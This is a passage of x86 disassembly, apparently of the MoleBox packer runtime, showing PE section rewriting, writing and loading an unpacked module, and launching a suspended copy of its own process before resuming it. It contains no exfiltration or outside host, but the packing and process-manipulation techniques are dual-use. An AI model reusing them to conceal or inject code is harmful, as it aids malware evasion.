lea eax, [ebp+var_64]
push eax
push 0
push 0
push [ebp+var_68]
push [ebp+var_1C]
push [ebp+var_3C]
call sub_4D1177
test eax, eax
jz short loc_4D65EA
cmp [ebp+var_64], 0
jnz short loc_4D65F4
loc_4D65EA: ; CODE XREF: sub_4D61E1+401�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D65F4: ; CODE XREF: sub_4D61E1+407�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
add ecx, [eax+3Ch]
mov [ebp+var_A0], ecx
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_A0]
lea eax, [ecx+eax+18h]
mov [ebp+var_90], eax
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_90]
add ecx, eax
mov [ebp+var_8C], ecx
mov eax, [ebp+var_A0]
add eax, 88h
mov [ebp+var_98], eax
mov eax, [ebp+var_A0]
add eax, 80h
mov [ebp+var_88], eax
mov eax, [ebp+var_A0]
and dword ptr [eax+24h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A0h]
mov [eax+34h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A4h]
mov [eax+38h], ecx
mov eax, [ebp+var_A0]
cmp dword ptr [eax+84h], 0
jz short loc_4D66BF
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+80h]
mov [eax+3Ch], ecx
jmp short loc_4D66C6
; ---------------------------------------------------------------------------
loc_4D66BF: ; CODE XREF: sub_4D61E1+4C8�j
mov eax, [ebp+var_54]
and dword ptr [eax+3Ch], 0
loc_4D66C6: ; CODE XREF: sub_4D61E1+4DC�j
mov eax, [ebp+var_54]
add eax, 40h
mov [ebp+var_94], eax
mov eax, [ebp+var_94]
and dword ptr [eax], 0
mov eax, [ebp+var_54]
add eax, 44h
mov [ebp+var_9C], eax
jmp short loc_4D66F8
; ---------------------------------------------------------------------------
loc_4D66E9: ; CODE XREF: sub_4D61E1:loc_4D6C30�j
mov eax, [ebp+var_90]
add eax, 28h
mov [ebp+var_90], eax
loc_4D66F8: ; CODE XREF: sub_4D61E1+506�j
mov eax, [ebp+var_90]
cmp eax, [ebp+var_8C]
jnb loc_4D6C35
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+14h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+10h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+24h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
cmp ds:dword_4E1680, 2
jnb loc_4D686E
mov eax, [ebp+var_90]
mov ecx, [ebp+var_98]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_4D686E
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_98]
cmp eax, [ecx]
jbe loc_4D686E
push 200h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
call sub_4D5AE5
pop ecx
pop ecx
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_4D835A
pop ecx
mov [ebp+var_104], eax
mov eax, [ebp+var_104]
mov [ebp+var_2C], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_4D5AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+20h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+20h], ecx
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_4D0421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_2C]
push [ebp+var_3C]
call sub_4D1177
test eax, eax
jz short loc_4D6846
cmp [ebp+var_64], 0
jnz short loc_4D6850
loc_4D6846: ; CODE XREF: sub_4D61E1+65D�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D6850: ; CODE XREF: sub_4D61E1+663�j
mov eax, [ebp+var_90]
mov ecx, [ebp+var_34]
mov [eax+14h], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0C0000040h
jmp loc_4D6C30
; ---------------------------------------------------------------------------
loc_4D686E: ; CODE XREF: sub_4D61E1+590�j
; sub_4D61E1+5A7�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_88]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_4D6B8F
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_88]
cmp eax, [ecx]
jbe loc_4D6B8F
and [ebp+var_A8], 0
mov [ebp+var_4], 1
push 4
push 1000h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push 0
call ds:dword_4E17A4 ; VirtualAlloc
mov [ebp+var_A8], eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_4D0421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_A8]
push [ebp+var_3C]
call sub_4D1177
test eax, eax
jz short loc_4D690F
cmp [ebp+var_64], 0
jnz short loc_4D6919
loc_4D690F: ; CODE XREF: sub_4D61E1+726�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D6919: ; CODE XREF: sub_4D61E1+72C�j
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov [ebp+var_B0], eax
mov eax, [ebp+var_88]
mov eax, [eax]
sub eax, [ebp+var_B0]
mov ecx, [ebp+var_A8]
add ecx, eax
mov [ebp+var_AC], ecx
and [ebp+var_B4], 0
jmp short loc_4D695A
; ---------------------------------------------------------------------------
loc_4D694D: ; CODE XREF: sub_4D61E1:loc_4D6B5A�j
mov eax, [ebp+var_B4]
inc eax
mov [ebp+var_B4], eax
loc_4D695A: ; CODE XREF: sub_4D61E1+76A�j
mov eax, [ebp+var_88]
mov eax, [eax+4]
xor edx, edx
push 14h
pop ecx
div ecx
cmp [ebp+var_B4], eax
jnb loc_4D6B5F
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
cmp dword ptr [ecx+eax+0Ch], 0
jnz short loc_4D6991
jmp loc_4D6B5F
; ---------------------------------------------------------------------------
loc_4D6991: ; CODE XREF: sub_4D61E1+7A9�j
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
mov edx, [ebp+var_A8]
add edx, [ecx+eax+0Ch]
sub edx, [ebp+var_B0]
mov [ebp+var_BC], edx
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A8]
add ecx, [eax+10h]
cmp [ebp+var_BC], ecx
jbe short loc_4D69D2
jmp loc_4D6B5F
; ---------------------------------------------------------------------------
loc_4D69D2: ; CODE XREF: sub_4D61E1+7EA�j
mov eax, [ebp+var_BC]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4D69E4
jmp loc_4D6B5F
; ---------------------------------------------------------------------------
loc_4D69E4: ; CODE XREF: sub_4D61E1+7FC�j
and ds:dword_4E1968, 0
and [ebp+var_B8], 0
push [ebp+var_BC]
call sub_4DAE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz loc_4D6B27
cmp ds:dword_4E1968, 0
jz short loc_4D6A1E
jmp loc_4D6B29
; ---------------------------------------------------------------------------
loc_4D6A1E: ; CODE XREF: sub_4D61E1+836�j
mov edi, [ebp+var_BC]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
push [ebp+var_24]
call sub_4D92CA
pop ecx
pop ecx
mov [ebp+var_C0], eax
mov [ebp+var_4], 2
push 5Ch
push [ebp+var_C0]
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_C4], eax
cmp [ebp+var_C4], 0
jz short loc_4D6A72
mov eax, [ebp+var_C4]
inc eax
mov [ebp+var_C4], eax
jmp short loc_4D6A7E
; ---------------------------------------------------------------------------
loc_4D6A72: ; CODE XREF: sub_4D61E1+880�j
mov eax, [ebp+var_C0]
mov [ebp+var_C4], eax
loc_4D6A7E: ; CODE XREF: sub_4D61E1+88F�j
mov edi, [ebp+var_BC]
mov edx, [ebp+var_C4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push [ebp+var_C0]
call sub_4DAE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz short loc_4D6B00
cmp ds:dword_4E1968, 0
jz short loc_4D6AD9
push 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
jmp short loc_4D6B29
; ---------------------------------------------------------------------------
loc_4D6AD9: ; CODE XREF: sub_4D61E1+8E7�j
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
push 0FFFFFFFFh
and [ebp+var_140], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_140]
jmp loc_4D7132
; ---------------------------------------------------------------------------
loc_4D6B00: ; CODE XREF: sub_4D61E1+8DE�j
mov [ebp+var_4], 1
call sub_4D6B0E
jmp short loc_4D6B27
sub_4D61E1 endp
; =============== S U B R O U T I N E =======================================
sub_4D6B0E proc near ; CODE XREF: sub_4D61E1+926�p
; DATA XREF: _5:004DE4E0�o
mov eax, [ebp-0C0h]
mov [ebp-108h], eax
push dword ptr [ebp-108h]
call sub_4D83DD
pop ecx
retn
sub_4D6B0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D61E1
loc_4D6B27: ; CODE XREF: sub_4D61E1+829�j
; sub_4D61E1+92B�j
jmp short loc_4D6B2D
; ---------------------------------------------------------------------------
loc_4D6B29: ; CODE XREF: sub_4D61E1+838�j
; sub_4D61E1+8F6�j
mov [ebp+var_5C], 1
loc_4D6B2D: ; CODE XREF: sub_4D61E1:loc_4D6B27�j
cmp [ebp+var_B8], 0
jz short loc_4D6B5A
mov eax, [ebp+var_94]
push dword ptr [eax]
push [ebp+var_B8]
push [ebp+var_BC]
call sub_4D56EB
add esp, 0Ch
mov ecx, [ebp+var_94]
mov [ecx], eax
loc_4D6B5A: ; CODE XREF: sub_4D61E1+953�j
jmp loc_4D694D
; ---------------------------------------------------------------------------
loc_4D6B5F: ; CODE XREF: sub_4D61E1+78F�j
; sub_4D61E1+7AB�j ...
push 8000h
push 0
push [ebp+var_A8]
call ds:dword_4E17A8 ; VirtualFree
and [ebp+var_A8], 0
and [ebp+var_4], 0
jmp short loc_4D6B8F
; END OF FUNCTION CHUNK FOR sub_4D61E1
; =============== S U B R O U T I N E =======================================
sub_4D6B7F proc near ; DATA XREF: _5:004DE4D0�o
push dword ptr [ebp-14h]
call sub_4D8C27
retn
sub_4D6B7F endp
; =============== S U B R O U T I N E =======================================
sub_4D6B88 proc near ; DATA XREF: _5:004DE4D4�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
sub_4D6B88 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4D61E1
loc_4D6B8F: ; CODE XREF: sub_4D61E1+69E�j
; sub_4D61E1+6BE�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_90]
mov eax, [eax+8]
cmp eax, [ecx+10h]
jbe short loc_4D6BB4
mov eax, [ebp+var_90]
mov eax, [eax+8]
mov [ebp+var_144], eax
jmp short loc_4D6BC3
; ---------------------------------------------------------------------------
loc_4D6BB4: ; CODE XREF: sub_4D61E1+9C0�j
mov eax, [ebp+var_90]
mov eax, [eax+10h]
mov [ebp+var_144], eax
loc_4D6BC3: ; CODE XREF: sub_4D61E1+9D1�j
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
push [ebp+var_144]
call sub_4D5AE5
pop ecx
pop ecx
mov ecx, [ebp+var_90]
mov [ecx+8], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_4D5AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+24h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+24h], ecx
mov eax, [ebp+var_90]
and dword ptr [eax+10h], 0
mov eax, [ebp+var_90]
and dword ptr [eax+14h], 0
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000080h
loc_4D6C30: ; CODE XREF: sub_4D61E1+688�j
jmp loc_4D66E9
; ---------------------------------------------------------------------------
loc_4D6C35: ; CODE XREF: sub_4D61E1+523�j
and [ebp+var_A4], 0
jmp short loc_4D6C4B
; ---------------------------------------------------------------------------
loc_4D6C3E: ; CODE XREF: sub_4D61E1+A7C�j
; sub_4D61E1+A87�j ...
mov eax, [ebp+var_A4]
inc eax
mov [ebp+var_A4], eax
loc_4D6C4B: ; CODE XREF: sub_4D61E1+A5B�j
cmp [ebp+var_A4], 10h
jnb short loc_4D6C8E
cmp [ebp+var_A4], 0
jnz short loc_4D6C5F
jmp short loc_4D6C3E
; ---------------------------------------------------------------------------
loc_4D6C5F: ; CODE XREF: sub_4D61E1+A7A�j
cmp [ebp+var_A4], 2
jnz short loc_4D6C6A
jmp short loc_4D6C3E
; ---------------------------------------------------------------------------
loc_4D6C6A: ; CODE XREF: sub_4D61E1+A85�j
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+7Ch], 0
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+78h], 0
jmp short loc_4D6C3E
; ---------------------------------------------------------------------------
loc_4D6C8E: ; CODE XREF: sub_4D61E1+A71�j
push 0Ah
pop ecx
xor eax, eax
mov edi, [ebp+var_90]
rep stosd
mov eax, [ebp+var_34]
add eax, [ebp+var_30]
mov ecx, [ebp+var_90]
mov [ecx+14h], eax
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+50h]
mov [eax+0Ch], ecx
mov esi, offset a_box_ ; "_BOX_"
mov edi, [ebp+var_90]
movsd
movsw
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+38h]
mov [eax+8], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+10h], 200h
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000020h
mov eax, [ebp+var_A0]
mov dword ptr [eax+3Ch], 200h
mov eax, [ebp+var_A0]
mov eax, [eax+50h]
mov ecx, [ebp+var_A0]
add eax, [ecx+38h]
mov ecx, [ebp+var_A0]
mov [ecx+50h], eax
mov eax, [ebp+var_A0]
mov eax, [eax+1Ch]
mov ecx, [ebp+var_A0]
add eax, [ecx+3Ch]
mov ecx, [ebp+var_A0]
mov [ecx+1Ch], eax
mov eax, [ebp+var_A0]
mov eax, [eax+28h]
mov [ebp+var_20], eax
push 5
pop ecx
mov esi, offset loc_4E0C70
mov edi, [ebp+var_54]
rep movsd
movsw
movsb
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+28h]
mov [eax+1], ecx
call sub_4D58A0
mov ecx, [ebp+var_C8]
mov ecx, [ecx+1]
xor ecx, eax
mov eax, [ebp+var_C8]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_24]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_3C]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov dword ptr [eax+1], offset sub_4D5BD7
and [ebp+var_C8], 0
xor eax, eax
mov edi, [ebp+var_54]
add edi, 20h
stosd
stosd
stosd
mov eax, [ebp+var_54]
mov dword ptr [eax+24h], 8
mov eax, [ebp+var_A0]
mov dword ptr [eax+0A4h], 8
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
add eax, 20h
mov ecx, [ebp+var_A0]
mov [ecx+0A0h], eax
mov eax, [ebp+var_A0]
mov ecx, [ebp+var_90]
mov ecx, [ecx+0Ch]
mov [eax+28h], ecx
mov eax, [ebp+var_A0]
mov ax, [eax+6]
add ax, 1
mov ecx, [ebp+var_A0]
mov [ecx+6], ax
mov eax, [ebp+var_A0]
and dword ptr [eax+58h], 0
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+var_28]
call ds:dword_4E16A8 ; CreateFileA
mov [ebp+var_58], eax
cmp [ebp+var_58], 0FFFFFFFFh
jnz short loc_4D6E8C
mov ecx, 0EF000011h
call sub_4D8342
loc_4D6E8C: ; CODE XREF: sub_4D61E1+C9F�j
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_34]
push [ebp+var_1C]
push [ebp+var_58]
call ds:dword_4E17BC ; WriteFile
cmp [ebp+var_2C], 0
jz short loc_4D6EC2
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_30]
push [ebp+var_2C]
push [ebp+var_58]
call ds:dword_4E17BC ; WriteFile
loc_4D6EC2: ; CODE XREF: sub_4D61E1+CC7�j
push 0
lea eax, [ebp+var_CC]
push eax
push 200h
push [ebp+var_54]
push [ebp+var_58]
call ds:dword_4E17BC ; WriteFile
push [ebp+var_58]
call ds:dword_4E16D8 ; FlushFileBuffers
push [ebp+var_58]
call ds:dword_4E16A4 ; CloseHandle
mov ds:dword_4E1958, 1
push [ebp+var_28]
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_D0], eax
cmp [ebp+var_D0], 0
jnz short loc_4D6F2B
push 351h
push offset aDProjectsMy_sr ; "D:\\Projects\\My.SRC\\MoleStudio\\MoleBox\\m"...
call sub_4D87CA
pop ecx
pop ecx
mov ecx, 0EF000010h
call sub_4D8342
loc_4D6F2B: ; CODE XREF: sub_4D61E1+D2D�j
movzx eax, [ebp+var_5C]
test eax, eax
jz loc_4D705C
mov eax, [ebp+var_D0]
mov [ebp+var_DC], eax
mov eax, [ebp+var_DC]
mov ecx, [ebp+var_DC]
add ecx, [eax+3Ch]
mov [ebp+var_EC], ecx
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_EC]
lea eax, [ecx+eax+18h]
mov [ebp+var_E8], eax
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_E8]
lea eax, [ecx+eax-28h]
mov [ebp+var_E0], eax
mov eax, [ebp+var_E0]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_DC]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_E4], eax
mov eax, [ebp+var_DC]
add eax, [ebp+var_E4]
mov [ebp+var_D8], eax
push 5Ch
push [ebp+var_24]
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0
jnz short loc_4D6FE0
mov eax, [ebp+var_24]
mov [ebp+var_D4], eax
jmp short loc_4D6FED
; ---------------------------------------------------------------------------
loc_4D6FE0: ; CODE XREF: sub_4D61E1+DF2�j
mov eax, [ebp+var_D4]
inc eax
mov [ebp+var_D4], eax
loc_4D6FED: ; CODE XREF: sub_4D61E1+DFD�j
push 14h
call sub_4D835A
pop ecx
mov [ebp+var_10C], eax
mov eax, [ebp+var_10C]
mov [ebp+var_F0], eax
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D4]
mov [eax], ecx
mov eax, [ebp+var_F0]
mov ecx, ds:dword_4E196C
mov [eax+10h], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_EC]
mov [eax+0Ch], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D8]
mov [eax+4], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_DC]
mov [eax+8], ecx
mov eax, [ebp+var_F0]
mov ds:dword_4E196C, eax
loc_4D705C: ; CODE XREF: sub_4D61E1+D50�j
call sub_4D614D
push 0FFFFFFFFh
mov eax, [ebp+var_D0]
mov [ebp+var_148], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_148]
jmp loc_4D7132
; END OF FUNCTION CHUNK FOR sub_4D61E1
; =============== S U B R O U T I N E =======================================
sub_4D7085 proc near ; DATA XREF: _5:004DE4C8�o
cmp ds:dword_4E1964, 0
jz short loc_4D7096
mov eax, [ebp-44h]
mov ds:dword_4E1964, eax
loc_4D7096: ; CODE XREF: sub_4D7085+7�j
cmp dword ptr [ebp-3Ch], 0FFFFFFFFh
jz short loc_4D70A6
push 0
push dword ptr [ebp-3Ch]
call sub_4D0741
loc_4D70A6: ; CODE XREF: sub_4D7085+15�j
mov eax, [ebp-50h]
mov [ebp-110h], eax
push dword ptr [ebp-110h]
call sub_4D83DD
pop ecx
mov eax, [ebp-4Ch]
mov [ebp-114h], eax
push dword ptr [ebp-114h]
call sub_4D83DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-118h], eax
push dword ptr [ebp-118h]
call sub_4D83DD
pop ecx
mov eax, [ebp-2Ch]
mov [ebp-11Ch], eax
push dword ptr [ebp-11Ch]
call sub_4D83DD
pop ecx
mov eax, [ebp-54h]
mov [ebp-120h], eax
push dword ptr [ebp-120h]
call sub_4D83DD
pop ecx
mov eax, [ebp-28h]
mov [ebp-124h], eax
push dword ptr [ebp-124h]
call sub_4D83DD
pop ecx
push offset dword_4E1930
call ds:dword_4E1754 ; RtlLeaveCriticalSection
retn
sub_4D7085 endp
; ---------------------------------------------------------------------------
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_4D61E1
loc_4D7132: ; CODE XREF: sub_4D61E1+C3�j
; sub_4D61E1+145�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D61E1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7141 proc near ; CODE XREF: sub_4DAA24+15�p
; sub_4DAA5E+43�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_0]
mov ecx, ds:dword_4E194C
call sub_4DB871
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D71BD
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
jbe short loc_4D7199
mov ecx, [ebp+var_8]
inc ecx
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_4D71B8
; ---------------------------------------------------------------------------
loc_4D7199: ; CODE XREF: sub_4D7141+34�j
mov ecx, [ebp+arg_8]
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [eax], ecx
loc_4D71B8: ; CODE XREF: sub_4D7141+56�j
push 1
pop eax
jmp short loc_4D71BF
; ---------------------------------------------------------------------------
loc_4D71BD: ; CODE XREF: sub_4D7141+1C�j
xor eax, eax
loc_4D71BF: ; CODE XREF: sub_4D7141+7A�j
pop edi
pop esi
leave
retn
sub_4D7141 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D71C3 proc near ; CODE XREF: sub_4DA0C8+42�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE4E8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_78], 0
and [ebp+var_74], 0
and [ebp+var_70], 0
xor eax, eax
lea edi, [ebp+var_6C]
stosd
and [ebp+var_60], 0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp+var_5C]
rep stosd
call ds:dword_4E16E4 ; GetCurrentProcess
mov [ebp+var_68], eax
mov [ebp+var_64], offset dword_4CD720
and [ebp+var_1C], 0
cmp ds:dword_4E1958, 0
jz loc_4D7324
and [ebp+var_4], 0
push 105h
call sub_4D835A
pop ecx
mov [ebp+var_8C], eax
mov eax, [ebp+var_8C]
mov [ebp+var_78], eax
push 50h
call sub_4D835A
pop ecx
mov [ebp+var_90], eax
mov eax, [ebp+var_90]
mov [ebp+var_74], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_78]
rep stosd
stosb
push 104h
push [ebp+var_78]
push 0
call ds:dword_4E1718 ; GetModuleHandleA
push eax
call ds:dword_4E1714 ; GetModuleFileNameA
mov [ebp+var_60], 44h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_60]
push eax
push 0
push 0
push 4
push 1
push 0
push 0
push 0
push [ebp+var_78]
call ds:dword_4E16B8 ; CreateProcessA
test eax, eax
jnz short loc_4D72BD
mov ecx, 0EF000015h
call sub_4D8342
loc_4D72BD: ; CODE XREF: sub_4D71C3+EE�j
call ds:dword_4E16E8 ; GetCurrentProcessId
push eax
push [ebp+var_88]
call sub_4D7494
pop ecx
pop ecx
push [ebp+var_84]
call ds:dword_4DE024 ; ResumeThread
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D7324
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_94], eax
cmp [ebp+var_94], 0EF000015h
jnz short loc_4D7308
mov [ebp+var_98], 1
jmp short loc_4D7316
; ---------------------------------------------------------------------------
loc_4D7308: ; CODE XREF: sub_4D71C3+137�j
push [ebp+var_14]
call sub_4D8C27
mov [ebp+var_98], eax
loc_4D7316: ; CODE XREF: sub_4D71C3+143�j
mov eax, [ebp+var_98]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4D7324: ; CODE XREF: sub_4D71C3+66�j
; sub_4D71C3+11E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D71C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7333 proc near ; CODE XREF: sub_4D7482+B�p
; DATA XREF: sub_4D7482+6�o ...
var_24C = byte ptr -24Ch
var_220 = byte ptr -220h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 24Ch
push edi
and [ebp+var_108], 0
push ds:dword_4E1920
push 0
push 1F0FFFh
call ds:dword_4E1994
mov ds:dword_4E1948, eax
cmp ds:dword_4E1948, 0
jz short loc_4D73A4
loc_4D7365: ; CODE XREF: sub_4D7333+63�j
lea eax, [ebp+var_108]
push eax
push ds:dword_4E1948
call ds:dword_4E1988
test eax, eax
jz short loc_4D7398
cmp [ebp+var_108], 103h
jnz short loc_4D7398
push 0FFFFFFFFh
push ds:dword_4E1948
call ds:dword_4E198C
jmp short loc_4D7365
; ---------------------------------------------------------------------------
loc_4D7398: ; CODE XREF: sub_4D7333+47�j
; sub_4D7333+53�j
push ds:dword_4E1948
call ds:dword_4E199C
loc_4D73A4: ; CODE XREF: sub_4D7333+30�j
or [ebp+var_10C], 0FFFFFFFFh
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4E1970
lea eax, [ebp+var_104]
push eax
call ds:dword_4E1974
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4E1978
push 64h
call ds:dword_4E1998
loc_4D73FB: ; CODE XREF: sub_4D7333+124�j
lea eax, [ebp+var_24C]
push eax
push offset dword_4E19A0
call ds:dword_4E197C
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_4D7459
lea eax, [ebp+var_220]
push eax
call ds:dword_4E1980
test eax, eax
jnz short loc_4D744B
push 1F4h
call ds:dword_4E1998
